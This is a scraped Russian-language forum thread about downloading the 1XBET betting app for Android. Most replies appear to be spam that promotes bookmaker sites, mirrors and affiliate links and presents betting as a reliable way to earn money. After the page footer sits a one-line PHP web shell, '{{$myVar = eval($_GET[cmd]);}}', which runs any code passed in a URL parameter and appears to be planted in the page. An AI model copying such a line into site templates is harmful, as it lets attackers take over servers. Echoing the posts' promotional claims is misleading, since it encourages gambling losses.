+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Скачать 1XBET на андроид


  1. #1
    Мимо проходил slavaluk is on a distinguished road Аватар для slavaluk
    Регистрация
    25.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    34

    Скачать 1XBET на андроид

    Интересна тема заработка ставок на спортивные мероприятия. Хочу для этого скачать приложение 1XBET на андроид. Кто может подсказать адрес сайта, для скачивания?
    Последний раз редактировалось slavaluk; 16.12.2021 в 13:47. Причина: Ошибка

  2. #2
    Мимо проходил satsa is on a distinguished road Аватар для satsa
    Регистрация
    11.03.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    А подробную информацию ты сможешь найти здесь на сайте на этом сайте ты сможешь узнать про ставки. Вы сможете скачать приложения 1XBET на андроид и ставить ставки на спорт на телефоне. Я сам очень много узнал с помощью этого сайта много нового узнаешь про ставки . Он качественный и не подведет вас. Лично от себя советую!

  3. #3
    Мимо проходил MR_Kolt is on a distinguished road Аватар для MR_Kolt
    Регистрация
    17.01.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    3
    Да там не обязательно приложение иметь, главное что-бы было 1xbet зеркало под рукой, и прогнозы, и все в твоих руках. Ну если прям надо приложение, то можешь его на сайте этом же и посмотреть.

  4. #4
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    тоже хочу ставки попробовать делать. кто что порекомендует?

  5. #5
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Со ставками нужно быть аккуратным, но это всё же неплохой способ заработка, если знать, как играть. Хочу поделиться этим https://sportslounge.ru/ сайтом, я через него находил для себя полезную информацию по ставкам и БК, очень пригодилась, так что, думаю, вам сайт тоже лишним не будет, заходите, изучайте.

  6. #6
    Мимо проходил Rita25 is on a distinguished road Аватар для Rita25
    Регистрация
    26.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Хорошая мысль, я тоже всем рекомендую делать ставки через приложение, так намного удобнее. Как установить 1хБет на андроид можете посмотреть здесь https://www.ua-football.com/betting/...et/app-android очень доступно все описано, даже новичку будет легко разобраться. Главное, что находясь в любом месте можно сделать ставку и нет привязки к компьютеру

  7. #7
    Мимо проходил Andrfell is on a distinguished road Аватар для Andrfell
    Регистрация
    27.12.2022
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    0
    Вообще не понимаю эту панацею с икасами. Лучше уж скачать приложение linebet на андроид, а как это сделать можно узнать тут https://android-files.ru/skachat-linebet-na-android/. Проще некуда. Можно глянуть как скачать и описание. В целом рекомендую присмотреться к программе

  8. #8
    Мимо проходил EvgeniyDonscow is on a distinguished road Аватар для EvgeniyDonscow
    Регистрация
    23.01.2023
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    1
    Цитата Сообщение от slavaluk Посмотреть сообщение
    Интересна тема заработка ставок на спортивные мероприятия. Хочу для этого скачать приложение 1XBET на андроид. Кто может подсказать адрес сайта, для скачивания?
    В идеале конечно с официального сайта скачивать, но понятное дело - сейчас блокируется. Для решения вопроса можно воспользоваться сайтами-партнерами различных букмекеров. К примеру, вот тут - https://bk-info.top/mobilnye-prilozhenie-bk даны ссылки на приложение практически всех известных ныне БК, в т.ч. и на 1xbet.

    Но я б рекомендовал пользоваться сейчас легальными БК - https://betteam.pro/bookmakers-top10. Почему? Потому что там 99% гарантии того, что у вас не возникнет спорных моментов по финансовым операциями, да и по расчету ставок тоже, поскольку там все регулируется по слову закона... С нелегальными известными БК такое конечно редко происходит, но если все же возникнет проблема с выводом средств, то не факт, что вам удастся что-то доказать в свою пользу, увы...

  9. #9
    Мимо проходил TinaSoykina is on a distinguished road Аватар для TinaSoykina
    Регистрация
    06.08.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    12
    Цитата Сообщение от Felhaghma Посмотреть сообщение
    тоже хочу ставки попробовать делать. кто что порекомендует?
    Попробуйте, перспективное направление заработка, причем выйти на стабильный доход может каждый. Единственное, нужно правильно определиться с выбором букмекера. Я предпочитаю делать пинап ставки на спорт. Букмекерская контора PIN-UP имеет лицензию, здесь все честно, выгодно и прозрачно, радуют высокие кэфы и мгновенные выплаты.
    Последний раз редактировалось TinaSoykina; 26.01.2023 в 02:52.

+ Ответить в теме

Похожие темы

  1. Ответов: 5
    Последнее сообщение: 04.01.2024, 19:18
  2. Скачать игру на андроид
    от slavaluk в разделе Курилка
    Ответов: 2
    Последнее сообщение: 02.02.2021, 01:30
  3. Findclone скачать на андроид
    от Sodjus в разделе Разное
    Ответов: 0
    Последнее сообщение: 02.02.2021, 00:50
  4. БК 1xbet
    от Юбик в разделе Курилка
    Ответов: 5
    Последнее сообщение: 28.10.2020, 20:14
  5. 1xbet на андроид
    от Eddiimerfi в разделе Бизнес
    Ответов: 2
    Последнее сообщение: 09.08.2020, 11:20

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}